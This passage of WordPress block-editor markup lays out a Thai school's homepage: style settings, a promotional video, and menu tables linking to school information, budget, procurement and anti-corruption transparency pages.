ustomLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSi